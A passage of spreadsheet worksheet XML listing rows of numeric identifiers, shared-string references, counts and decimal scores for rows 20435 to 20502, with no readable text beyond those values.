        <v>5.0135573E7</v>
      </c>
      <c r="C20435" s="2" t="s">
        <v>19712</v>
      </c>
      <c r="D20435" s="2">
        <v>1.0</v>
      </c>
      <c r="E20435" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20435" s="2">
        <v>0.1175925925925926</v>
      </c>
    </row>
    <row r="20436" ht="15.75" customHeight="1">
      <c r="A20436" s="1">
        <v>18895.0</v>
      </c>
      <c r="B20436" s="2">
        <v>5.4136769E7</v>
      </c>
      <c r="C20436" s="2" t="s">
        <v>19713</v>
      </c>
      <c r="D20436" s="2">
        <v>1.0</v>
      </c>
      <c r="E20436" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20436" s="2">
        <v>0.1175925925925926</v>
      </c>
    </row>
    <row r="20437" ht="15.75" customHeight="1">
      <c r="A20437" s="1">
        <v>27108.0</v>
      </c>
      <c r="B20437" s="2">
        <v>2.0611936E7</v>
      </c>
      <c r="C20437" s="2" t="s">
        <v>19714</v>
      </c>
      <c r="D20437" s="2">
        <v>1.0</v>
      </c>
      <c r="E20437" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20437" s="2">
        <v>0.1175925925925926</v>
      </c>
    </row>
    <row r="20438" ht="15.75" customHeight="1">
      <c r="A20438" s="1">
        <v>29028.0</v>
      </c>
      <c r="B20438" s="2">
        <v>3.0101594E7</v>
      </c>
      <c r="C20438" s="2" t="s">
        <v>19715</v>
      </c>
      <c r="D20438" s="2">
        <v>1.0</v>
      </c>
      <c r="E20438" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20438" s="2">
        <v>0.1175925925925926</v>
      </c>
    </row>
    <row r="20439" ht="15.75" customHeight="1">
      <c r="A20439" s="1">
        <v>33827.0</v>
      </c>
      <c r="B20439" s="2">
        <v>8927443.0</v>
      </c>
      <c r="C20439" s="2" t="s">
        <v>19597</v>
      </c>
      <c r="D20439" s="2">
        <v>1.0</v>
      </c>
      <c r="E20439" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20439" s="2">
        <v>0.1175925925925926</v>
      </c>
    </row>
    <row r="20440" ht="15.75" customHeight="1">
      <c r="A20440" s="1">
        <v>169.0</v>
      </c>
      <c r="B20440" s="2">
        <v>1.3800126E7</v>
      </c>
      <c r="C20440" s="2" t="s">
        <v>19716</v>
      </c>
      <c r="D20440" s="2">
        <v>1.0</v>
      </c>
      <c r="E20440" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20440" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="20441" ht="15.75" customHeight="1">
      <c r="A20441" s="1">
        <v>412.0</v>
      </c>
      <c r="B20441" s="2">
        <v>1.6746045E7</v>
      </c>
      <c r="C20441" s="2" t="s">
        <v>19717</v>
      </c>
      <c r="D20441" s="2">
        <v>1.0</v>
      </c>
      <c r="E20441" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20441" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="20442" ht="15.75" customHeight="1">
      <c r="A20442" s="1">
        <v>992.0</v>
      </c>
      <c r="B20442" s="2">
        <v>2.291338E7</v>
      </c>
      <c r="C20442" s="2" t="s">
        <v>19718</v>
      </c>
      <c r="D20442" s="2">
        <v>1.0</v>
      </c>
      <c r="E20442" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20442" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="20443" ht="15.75" customHeight="1">
      <c r="A20443" s="1">
        <v>4081.0</v>
      </c>
      <c r="B20443" s="2">
        <v>4.1187046E7</v>
      </c>
      <c r="C20443" s="2" t="s">
        <v>19719</v>
      </c>
      <c r="D20443" s="2">
        <v>1.0</v>
      </c>
      <c r="E20443" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20443" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="20444" ht="15.75" customHeight="1">
      <c r="A20444" s="1">
        <v>4701.0</v>
      </c>
      <c r="B20444" s="2">
        <v>4.3251682E7</v>
      </c>
      <c r="C20444" s="2" t="s">
        <v>19720</v>
      </c>
      <c r="D20444" s="2">
        <v>1.0</v>
      </c>
      <c r="E20444" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20444" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="20445" ht="15.75" customHeight="1">
      <c r="A20445" s="1">
        <v>4951.0</v>
      </c>
      <c r="B20445" s="2">
        <v>4.4053344E7</v>
      </c>
      <c r="C20445" s="2" t="s">
        <v>19721</v>
      </c>
      <c r="D20445" s="2">
        <v>1.0</v>
      </c>
      <c r="E20445" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20445" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="20446" ht="15.75" customHeight="1">
      <c r="A20446" s="1">
        <v>5094.0</v>
      </c>
      <c r="B20446" s="2">
        <v>4.4498319E7</v>
      </c>
      <c r="C20446" s="2" t="s">
        <v>19722</v>
      </c>
      <c r="D20446" s="2">
        <v>1.0</v>
      </c>
      <c r="E20446" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20446" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="20447" ht="15.75" customHeight="1">
      <c r="A20447" s="1">
        <v>5811.0</v>
      </c>
      <c r="B20447" s="2">
        <v>4.682327E7</v>
      </c>
      <c r="C20447" s="2" t="s">
        <v>19723</v>
      </c>
      <c r="D20447" s="2">
        <v>1.0</v>
      </c>
      <c r="E20447" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20447" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="20448" ht="15.75" customHeight="1">
      <c r="A20448" s="1">
        <v>12583.0</v>
      </c>
      <c r="B20448" s="2">
        <v>3.0018312E7</v>
      </c>
      <c r="C20448" s="2" t="s">
        <v>19724</v>
      </c>
      <c r="D20448" s="2">
        <v>1.0</v>
      </c>
      <c r="E20448" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20448" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="20449" ht="15.75" customHeight="1">
      <c r="A20449" s="1">
        <v>15827.0</v>
      </c>
      <c r="B20449" s="2">
        <v>4.431159E7</v>
      </c>
      <c r="C20449" s="2" t="s">
        <v>19725</v>
      </c>
      <c r="D20449" s="2">
        <v>1.0</v>
      </c>
      <c r="E20449" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20449" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="20450" ht="15.75" customHeight="1">
      <c r="A20450" s="1">
        <v>18570.0</v>
      </c>
      <c r="B20450" s="2">
        <v>5.3196788E7</v>
      </c>
      <c r="C20450" s="2" t="s">
        <v>19726</v>
      </c>
      <c r="D20450" s="2">
        <v>1.0</v>
      </c>
      <c r="E20450" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20450" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="20451" ht="15.75" customHeight="1">
      <c r="A20451" s="1">
        <v>23363.0</v>
      </c>
      <c r="B20451" s="2">
        <v>5.5099954E7</v>
      </c>
      <c r="C20451" s="2" t="s">
        <v>19727</v>
      </c>
      <c r="D20451" s="2">
        <v>1.0</v>
      </c>
      <c r="E20451" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20451" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="20452" ht="15.75" customHeight="1">
      <c r="A20452" s="1">
        <v>27632.0</v>
      </c>
      <c r="B20452" s="2">
        <v>2.2730108E7</v>
      </c>
      <c r="C20452" s="2" t="s">
        <v>19728</v>
      </c>
      <c r="D20452" s="2">
        <v>1.0</v>
      </c>
      <c r="E20452" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20452" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="20453" ht="15.75" customHeight="1">
      <c r="A20453" s="1">
        <v>29571.0</v>
      </c>
      <c r="B20453" s="2">
        <v>3.3294412E7</v>
      </c>
      <c r="C20453" s="2" t="s">
        <v>19729</v>
      </c>
      <c r="D20453" s="2">
        <v>1.0</v>
      </c>
      <c r="E20453" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20453" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="20454" ht="15.75" customHeight="1">
      <c r="A20454" s="1">
        <v>6192.0</v>
      </c>
      <c r="B20454" s="2">
        <v>4.7933411E7</v>
      </c>
      <c r="C20454" s="2" t="s">
        <v>19730</v>
      </c>
      <c r="D20454" s="2">
        <v>1.0</v>
      </c>
      <c r="E20454" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20454" s="2">
        <v>0.1173835125448029</v>
      </c>
    </row>
    <row r="20455" ht="15.75" customHeight="1">
      <c r="A20455" s="1">
        <v>16948.0</v>
      </c>
      <c r="B20455" s="2">
        <v>4.8234752E7</v>
      </c>
      <c r="C20455" s="2" t="s">
        <v>19731</v>
      </c>
      <c r="D20455" s="2">
        <v>1.0</v>
      </c>
      <c r="E20455" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20455" s="2">
        <v>0.117283950617284</v>
      </c>
    </row>
    <row r="20456" ht="15.75" customHeight="1">
      <c r="A20456" s="1">
        <v>28123.0</v>
      </c>
      <c r="B20456" s="2">
        <v>2.4705237E7</v>
      </c>
      <c r="C20456" s="2" t="s">
        <v>19732</v>
      </c>
      <c r="D20456" s="2">
        <v>1.0</v>
      </c>
      <c r="E20456" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20456" s="2">
        <v>0.117283950617284</v>
      </c>
    </row>
    <row r="20457" ht="15.75" customHeight="1">
      <c r="A20457" s="1">
        <v>12754.0</v>
      </c>
      <c r="B20457" s="2">
        <v>3.1126185E7</v>
      </c>
      <c r="C20457" s="2" t="s">
        <v>19733</v>
      </c>
      <c r="D20457" s="2">
        <v>1.0</v>
      </c>
      <c r="E20457" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20457" s="2">
        <v>0.1171875</v>
      </c>
    </row>
    <row r="20458" ht="15.75" customHeight="1">
      <c r="A20458" s="1">
        <v>17355.0</v>
      </c>
      <c r="B20458" s="2">
        <v>4.9434329E7</v>
      </c>
      <c r="C20458" s="2" t="s">
        <v>19734</v>
      </c>
      <c r="D20458" s="2">
        <v>1.0</v>
      </c>
      <c r="E20458" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20458" s="2">
        <v>0.1169154228855722</v>
      </c>
    </row>
    <row r="20459" ht="15.75" customHeight="1">
      <c r="A20459" s="1">
        <v>890.0</v>
      </c>
      <c r="B20459" s="2">
        <v>2.2020131E7</v>
      </c>
      <c r="C20459" s="2" t="s">
        <v>19735</v>
      </c>
      <c r="D20459" s="2">
        <v>1.0</v>
      </c>
      <c r="E20459" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20459" s="2">
        <v>0.1164529914529914</v>
      </c>
    </row>
    <row r="20460" ht="15.75" customHeight="1">
      <c r="A20460" s="1">
        <v>1206.0</v>
      </c>
      <c r="B20460" s="2">
        <v>2.4834189E7</v>
      </c>
      <c r="C20460" s="2" t="s">
        <v>19736</v>
      </c>
      <c r="D20460" s="2">
        <v>1.0</v>
      </c>
      <c r="E20460" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20460" s="2">
        <v>0.1164529914529914</v>
      </c>
    </row>
    <row r="20461" ht="15.75" customHeight="1">
      <c r="A20461" s="1">
        <v>1593.0</v>
      </c>
      <c r="B20461" s="2">
        <v>2.7756003E7</v>
      </c>
      <c r="C20461" s="2" t="s">
        <v>19737</v>
      </c>
      <c r="D20461" s="2">
        <v>1.0</v>
      </c>
      <c r="E20461" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20461" s="2">
        <v>0.1164529914529914</v>
      </c>
    </row>
    <row r="20462" ht="15.75" customHeight="1">
      <c r="A20462" s="1">
        <v>1712.0</v>
      </c>
      <c r="B20462" s="2">
        <v>2.8589411E7</v>
      </c>
      <c r="C20462" s="2" t="s">
        <v>19738</v>
      </c>
      <c r="D20462" s="2">
        <v>1.0</v>
      </c>
      <c r="E20462" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20462" s="2">
        <v>0.1164529914529914</v>
      </c>
    </row>
    <row r="20463" ht="15.75" customHeight="1">
      <c r="A20463" s="1">
        <v>2336.0</v>
      </c>
      <c r="B20463" s="2">
        <v>3.296128E7</v>
      </c>
      <c r="C20463" s="2" t="s">
        <v>19739</v>
      </c>
      <c r="D20463" s="2">
        <v>1.0</v>
      </c>
      <c r="E20463" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20463" s="2">
        <v>0.1164529914529914</v>
      </c>
    </row>
    <row r="20464" ht="15.75" customHeight="1">
      <c r="A20464" s="1">
        <v>5182.0</v>
      </c>
      <c r="B20464" s="2">
        <v>4.4780253E7</v>
      </c>
      <c r="C20464" s="2" t="s">
        <v>19740</v>
      </c>
      <c r="D20464" s="2">
        <v>1.0</v>
      </c>
      <c r="E20464" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20464" s="2">
        <v>0.1164529914529914</v>
      </c>
    </row>
    <row r="20465" ht="15.75" customHeight="1">
      <c r="A20465" s="1">
        <v>6134.0</v>
      </c>
      <c r="B20465" s="2">
        <v>4.7809645E7</v>
      </c>
      <c r="C20465" s="2" t="s">
        <v>19741</v>
      </c>
      <c r="D20465" s="2">
        <v>1.0</v>
      </c>
      <c r="E20465" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20465" s="2">
        <v>0.1164529914529914</v>
      </c>
    </row>
    <row r="20466" ht="15.75" customHeight="1">
      <c r="A20466" s="1">
        <v>9756.0</v>
      </c>
      <c r="B20466" s="2">
        <v>5.6491005E7</v>
      </c>
      <c r="C20466" s="2" t="s">
        <v>19742</v>
      </c>
      <c r="D20466" s="2">
        <v>1.0</v>
      </c>
      <c r="E20466" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20466" s="2">
        <v>0.1164529914529914</v>
      </c>
    </row>
    <row r="20467" ht="15.75" customHeight="1">
      <c r="A20467" s="1">
        <v>9912.0</v>
      </c>
      <c r="B20467" s="2">
        <v>5.6795048E7</v>
      </c>
      <c r="C20467" s="2" t="s">
        <v>19743</v>
      </c>
      <c r="D20467" s="2">
        <v>1.0</v>
      </c>
      <c r="E20467" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20467" s="2">
        <v>0.1164529914529914</v>
      </c>
    </row>
    <row r="20468" ht="15.75" customHeight="1">
      <c r="A20468" s="1">
        <v>10675.0</v>
      </c>
      <c r="B20468" s="2">
        <v>1.4535645E7</v>
      </c>
      <c r="C20468" s="2" t="s">
        <v>19744</v>
      </c>
      <c r="D20468" s="2">
        <v>1.0</v>
      </c>
      <c r="E20468" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20468" s="2">
        <v>0.1164529914529914</v>
      </c>
    </row>
    <row r="20469" ht="15.75" customHeight="1">
      <c r="A20469" s="1">
        <v>16191.0</v>
      </c>
      <c r="B20469" s="2">
        <v>4.56606E7</v>
      </c>
      <c r="C20469" s="2" t="s">
        <v>19745</v>
      </c>
      <c r="D20469" s="2">
        <v>1.0</v>
      </c>
      <c r="E20469" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20469" s="2">
        <v>0.1164529914529914</v>
      </c>
    </row>
    <row r="20470" ht="15.75" customHeight="1">
      <c r="A20470" s="1">
        <v>17229.0</v>
      </c>
      <c r="B20470" s="2">
        <v>4.9066306E7</v>
      </c>
      <c r="C20470" s="2" t="s">
        <v>19746</v>
      </c>
      <c r="D20470" s="2">
        <v>1.0</v>
      </c>
      <c r="E20470" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20470" s="2">
        <v>0.1164529914529914</v>
      </c>
    </row>
    <row r="20471" ht="15.75" customHeight="1">
      <c r="A20471" s="1">
        <v>43.0</v>
      </c>
      <c r="B20471" s="2">
        <v>1.0743952E7</v>
      </c>
      <c r="C20471" s="2" t="s">
        <v>19747</v>
      </c>
      <c r="D20471" s="2">
        <v>1.0</v>
      </c>
      <c r="E20471" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20471" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="20472" ht="15.75" customHeight="1">
      <c r="A20472" s="1">
        <v>855.0</v>
      </c>
      <c r="B20472" s="2">
        <v>2.1733228E7</v>
      </c>
      <c r="C20472" s="2" t="s">
        <v>19748</v>
      </c>
      <c r="D20472" s="2">
        <v>1.0</v>
      </c>
      <c r="E20472" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20472" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="20473" ht="15.75" customHeight="1">
      <c r="A20473" s="1">
        <v>1005.0</v>
      </c>
      <c r="B20473" s="2">
        <v>2.3049441E7</v>
      </c>
      <c r="C20473" s="2" t="s">
        <v>19749</v>
      </c>
      <c r="D20473" s="2">
        <v>1.0</v>
      </c>
      <c r="E20473" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20473" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="20474" ht="15.75" customHeight="1">
      <c r="A20474" s="1">
        <v>1043.0</v>
      </c>
      <c r="B20474" s="2">
        <v>2.3342699E7</v>
      </c>
      <c r="C20474" s="2" t="s">
        <v>19750</v>
      </c>
      <c r="D20474" s="2">
        <v>1.0</v>
      </c>
      <c r="E20474" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20474" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="20475" ht="15.75" customHeight="1">
      <c r="A20475" s="1">
        <v>1287.0</v>
      </c>
      <c r="B20475" s="2">
        <v>2.5591406E7</v>
      </c>
      <c r="C20475" s="2" t="s">
        <v>19751</v>
      </c>
      <c r="D20475" s="2">
        <v>1.0</v>
      </c>
      <c r="E20475" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20475" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="20476" ht="15.75" customHeight="1">
      <c r="A20476" s="1">
        <v>1973.0</v>
      </c>
      <c r="B20476" s="2">
        <v>3.0412261E7</v>
      </c>
      <c r="C20476" s="2" t="s">
        <v>19752</v>
      </c>
      <c r="D20476" s="2">
        <v>1.0</v>
      </c>
      <c r="E20476" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20476" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="20477" ht="15.75" customHeight="1">
      <c r="A20477" s="1">
        <v>2885.0</v>
      </c>
      <c r="B20477" s="2">
        <v>3.5685936E7</v>
      </c>
      <c r="C20477" s="2" t="s">
        <v>19753</v>
      </c>
      <c r="D20477" s="2">
        <v>1.0</v>
      </c>
      <c r="E20477" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20477" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="20478" ht="15.75" customHeight="1">
      <c r="A20478" s="1">
        <v>3728.0</v>
      </c>
      <c r="B20478" s="2">
        <v>3.9631011E7</v>
      </c>
      <c r="C20478" s="2" t="s">
        <v>19754</v>
      </c>
      <c r="D20478" s="2">
        <v>1.0</v>
      </c>
      <c r="E20478" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20478" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="20479" ht="15.75" customHeight="1">
      <c r="A20479" s="1">
        <v>3853.0</v>
      </c>
      <c r="B20479" s="2">
        <v>4.0298563E7</v>
      </c>
      <c r="C20479" s="2" t="s">
        <v>19755</v>
      </c>
      <c r="D20479" s="2">
        <v>1.0</v>
      </c>
      <c r="E20479" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20479" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="20480" ht="15.75" customHeight="1">
      <c r="A20480" s="1">
        <v>4123.0</v>
      </c>
      <c r="B20480" s="2">
        <v>4.1369026E7</v>
      </c>
      <c r="C20480" s="2" t="s">
        <v>19756</v>
      </c>
      <c r="D20480" s="2">
        <v>1.0</v>
      </c>
      <c r="E20480" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20480" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="20481" ht="15.75" customHeight="1">
      <c r="A20481" s="1">
        <v>4428.0</v>
      </c>
      <c r="B20481" s="2">
        <v>4.232497E7</v>
      </c>
      <c r="C20481" s="2" t="s">
        <v>19757</v>
      </c>
      <c r="D20481" s="2">
        <v>1.0</v>
      </c>
      <c r="E20481" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20481" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="20482" ht="15.75" customHeight="1">
      <c r="A20482" s="1">
        <v>4776.0</v>
      </c>
      <c r="B20482" s="2">
        <v>4.3438979E7</v>
      </c>
      <c r="C20482" s="2" t="s">
        <v>19758</v>
      </c>
      <c r="D20482" s="2">
        <v>1.0</v>
      </c>
      <c r="E20482" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20482" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="20483" ht="15.75" customHeight="1">
      <c r="A20483" s="1">
        <v>5807.0</v>
      </c>
      <c r="B20483" s="2">
        <v>4.6791727E7</v>
      </c>
      <c r="C20483" s="2" t="s">
        <v>19759</v>
      </c>
      <c r="D20483" s="2">
        <v>1.0</v>
      </c>
      <c r="E20483" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20483" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="20484" ht="15.75" customHeight="1">
      <c r="A20484" s="1">
        <v>6225.0</v>
      </c>
      <c r="B20484" s="2">
        <v>4.802764E7</v>
      </c>
      <c r="C20484" s="2" t="s">
        <v>19760</v>
      </c>
      <c r="D20484" s="2">
        <v>1.0</v>
      </c>
      <c r="E20484" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20484" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="20485" ht="15.75" customHeight="1">
      <c r="A20485" s="1">
        <v>6244.0</v>
      </c>
      <c r="B20485" s="2">
        <v>4.8098481E7</v>
      </c>
      <c r="C20485" s="2" t="s">
        <v>19761</v>
      </c>
      <c r="D20485" s="2">
        <v>1.0</v>
      </c>
      <c r="E20485" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20485" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="20486" ht="15.75" customHeight="1">
      <c r="A20486" s="1">
        <v>6459.0</v>
      </c>
      <c r="B20486" s="2">
        <v>4.8612546E7</v>
      </c>
      <c r="C20486" s="2" t="s">
        <v>19762</v>
      </c>
      <c r="D20486" s="2">
        <v>1.0</v>
      </c>
      <c r="E20486" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20486" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="20487" ht="15.75" customHeight="1">
      <c r="A20487" s="1">
        <v>6770.0</v>
      </c>
      <c r="B20487" s="2">
        <v>4.9428899E7</v>
      </c>
      <c r="C20487" s="2" t="s">
        <v>19763</v>
      </c>
      <c r="D20487" s="2">
        <v>1.0</v>
      </c>
      <c r="E20487" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20487" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="20488" ht="15.75" customHeight="1">
      <c r="A20488" s="1">
        <v>6968.0</v>
      </c>
      <c r="B20488" s="2">
        <v>4.9987019E7</v>
      </c>
      <c r="C20488" s="2" t="s">
        <v>19764</v>
      </c>
      <c r="D20488" s="2">
        <v>1.0</v>
      </c>
      <c r="E20488" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20488" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="20489" ht="15.75" customHeight="1">
      <c r="A20489" s="1">
        <v>6983.0</v>
      </c>
      <c r="B20489" s="2">
        <v>5.0044885E7</v>
      </c>
      <c r="C20489" s="2" t="s">
        <v>19765</v>
      </c>
      <c r="D20489" s="2">
        <v>1.0</v>
      </c>
      <c r="E20489" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20489" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="20490" ht="15.75" customHeight="1">
      <c r="A20490" s="1">
        <v>7248.0</v>
      </c>
      <c r="B20490" s="2">
        <v>5.0705605E7</v>
      </c>
      <c r="C20490" s="2" t="s">
        <v>19766</v>
      </c>
      <c r="D20490" s="2">
        <v>1.0</v>
      </c>
      <c r="E20490" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20490" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="20491" ht="15.75" customHeight="1">
      <c r="A20491" s="1">
        <v>7902.0</v>
      </c>
      <c r="B20491" s="2">
        <v>5.2480905E7</v>
      </c>
      <c r="C20491" s="2" t="s">
        <v>19767</v>
      </c>
      <c r="D20491" s="2">
        <v>1.0</v>
      </c>
      <c r="E20491" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20491" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="20492" ht="15.75" customHeight="1">
      <c r="A20492" s="1">
        <v>7981.0</v>
      </c>
      <c r="B20492" s="2">
        <v>5.2722444E7</v>
      </c>
      <c r="C20492" s="2" t="s">
        <v>19768</v>
      </c>
      <c r="D20492" s="2">
        <v>1.0</v>
      </c>
      <c r="E20492" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20492" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="20493" ht="15.75" customHeight="1">
      <c r="A20493" s="1">
        <v>8374.0</v>
      </c>
      <c r="B20493" s="2">
        <v>5.3810109E7</v>
      </c>
      <c r="C20493" s="2" t="s">
        <v>19767</v>
      </c>
      <c r="D20493" s="2">
        <v>1.0</v>
      </c>
      <c r="E20493" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20493" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="20494" ht="15.75" customHeight="1">
      <c r="A20494" s="1">
        <v>8573.0</v>
      </c>
      <c r="B20494" s="2">
        <v>5.420242E7</v>
      </c>
      <c r="C20494" s="2" t="s">
        <v>19769</v>
      </c>
      <c r="D20494" s="2">
        <v>1.0</v>
      </c>
      <c r="E20494" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20494" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="20495" ht="15.75" customHeight="1">
      <c r="A20495" s="1">
        <v>8662.0</v>
      </c>
      <c r="B20495" s="2">
        <v>5.435453E7</v>
      </c>
      <c r="C20495" s="2" t="s">
        <v>19770</v>
      </c>
      <c r="D20495" s="2">
        <v>1.0</v>
      </c>
      <c r="E20495" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20495" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="20496" ht="15.75" customHeight="1">
      <c r="A20496" s="1">
        <v>9599.0</v>
      </c>
      <c r="B20496" s="2">
        <v>5.613729E7</v>
      </c>
      <c r="C20496" s="2" t="s">
        <v>19771</v>
      </c>
      <c r="D20496" s="2">
        <v>1.0</v>
      </c>
      <c r="E20496" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20496" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="20497" ht="15.75" customHeight="1">
      <c r="A20497" s="1">
        <v>9711.0</v>
      </c>
      <c r="B20497" s="2">
        <v>5.6388897E7</v>
      </c>
      <c r="C20497" s="2" t="s">
        <v>19772</v>
      </c>
      <c r="D20497" s="2">
        <v>1.0</v>
      </c>
      <c r="E20497" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20497" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="20498" ht="15.75" customHeight="1">
      <c r="A20498" s="1">
        <v>10449.0</v>
      </c>
      <c r="B20498" s="2">
        <v>1.0575485E7</v>
      </c>
      <c r="C20498" s="2" t="s">
        <v>19773</v>
      </c>
      <c r="D20498" s="2">
        <v>1.0</v>
      </c>
      <c r="E20498" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20498" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="20499" ht="15.75" customHeight="1">
      <c r="A20499" s="1">
        <v>10522.0</v>
      </c>
      <c r="B20499" s="2">
        <v>1.202483E7</v>
      </c>
      <c r="C20499" s="2" t="s">
        <v>19774</v>
      </c>
      <c r="D20499" s="2">
        <v>1.0</v>
      </c>
      <c r="E20499" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20499" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="20500" ht="15.75" customHeight="1">
      <c r="A20500" s="1">
        <v>10747.0</v>
      </c>
      <c r="B20500" s="2">
        <v>1.5463372E7</v>
      </c>
      <c r="C20500" s="2" t="s">
        <v>19775</v>
      </c>
      <c r="D20500" s="2">
        <v>1.0</v>
      </c>
      <c r="E20500" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20500" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="20501" ht="15.75" customHeight="1">
      <c r="A20501" s="1">
        <v>11058.0</v>
      </c>
      <c r="B20501" s="2">
        <v>1.8197809E7</v>
      </c>
      <c r="C20501" s="2" t="s">
        <v>19776</v>
      </c>
      <c r="D20501" s="2">
        <v>1.0</v>
      </c>
      <c r="E20501" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20501" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="20502" ht="15.75" customHeight="1">
      <c r="A20502" s="1">
        <v>11149.0</v>
      </c>
      <c r="B20502" s="2">
        <v>1.9361679E7</v>
